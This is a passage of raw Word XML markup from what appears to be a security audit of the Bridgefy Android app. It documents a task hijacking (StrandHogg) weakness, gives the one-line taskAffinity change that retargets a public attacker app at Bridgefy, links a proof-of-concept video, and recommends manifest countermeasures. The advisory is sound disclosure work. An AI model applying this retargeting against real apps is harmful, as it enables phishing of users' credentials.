        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="370" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The issue was further validated at runtime using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AttackerApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Task_Hijacking_Strandhogg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>github project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Only the following change was made prior to building the app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app/src/main/AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487598592">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170562</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="36" name="Graphic 36"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="36" name="Graphic 36"/>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3.430127pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15717888;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape27" coordorigin="1440,269" coordsize="2880,0" path="m1440,269l4320,269e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.xda-developers.com/strandhogg-2-0.../</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/az0mb13/Task_Hijacking_Strandhogg/tree/main/AttackerApp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId71">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/az0mb13/Task_Hijacking_Strandhogg</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Before:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>taskAffinity=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.zombie.ssa"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>After:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>taskAffinity=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.staging"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To ease the understanding of this problem, an example of a malicious app was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>created to demonstrate the exploitability of this weakness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId72">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://7as.es/Bridgefy_ytn9q4n7/PoC/TaskHijacking_PoC.mp4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement as many of the following countermeasures as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>deemed feasible by the development team:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The task affinity should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>string.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>best</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>implemented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the Android manifest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>at the application level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, which will protect all activities and ensure the fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>even</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launcher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>changes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should use a randomly generated task affinity instead of the package name to prevent task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hijacking,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>predictable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>affinity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launchMode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should then be changed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>singleInstance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>singleTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). This will ensure continuous mitigation in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>StrandHogg 2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> while improving security strength against older task hijacking techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A custom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>onBackPressed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>implemented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
